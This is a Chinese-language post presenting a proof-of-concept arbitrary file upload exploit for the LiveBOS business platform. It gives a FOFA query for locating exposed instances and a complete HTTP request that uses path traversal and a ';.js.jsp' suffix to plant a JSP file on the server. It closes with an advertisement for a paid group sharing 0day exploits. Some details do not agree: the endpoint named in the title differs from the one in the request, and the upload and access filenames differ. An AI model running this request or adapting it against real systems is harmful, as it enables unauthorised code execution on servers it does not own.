LiveBOS-UploadImage.do-任意文件上传漏洞

介绍：

LiveBOS灵动业务架构平台，是面向对象的业务支撑平台与建模工具。在LiveBos的UploadImage.do接口中，发现了一处任意文件上传漏洞，攻击者可利用该漏洞上传任意文件。

fofa：

body="Power by LiveBOS"

poc：

POST /feed/UploadFile.do;.js.jsp HTTP/1.1 
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi
Connection: close
 
---WebKitFormBoundaryxegqoxxi
Content-Disposition:form-data; name="file"; filename="/../../../../rce.jsp"
Content-Type: image/jpeg
 
<%@ page import="java.io.File" %>
<%
 out.println("pppppppppoooooooocccccccccccc");
 String filePath = application.getRealPath(request.getServletPath());
 new File(filePath).delete();
%>
---WebKitFormBoundaryxegqoxxi--

连接地址：/1.jsp;.js.jsp

 内部福利介绍-更新啦，网络安全百分之八十的资源都可以在这找到！涵盖了POC库、账号共享、文档库、资源网获取、会员专属群，做你的网络安全资源大全！

近期更新的0day/1day(包含公开和未公开漏洞-仅列举部分)漏洞整理更新至9000+

👇内容太多扫描二维码查看详细介绍👇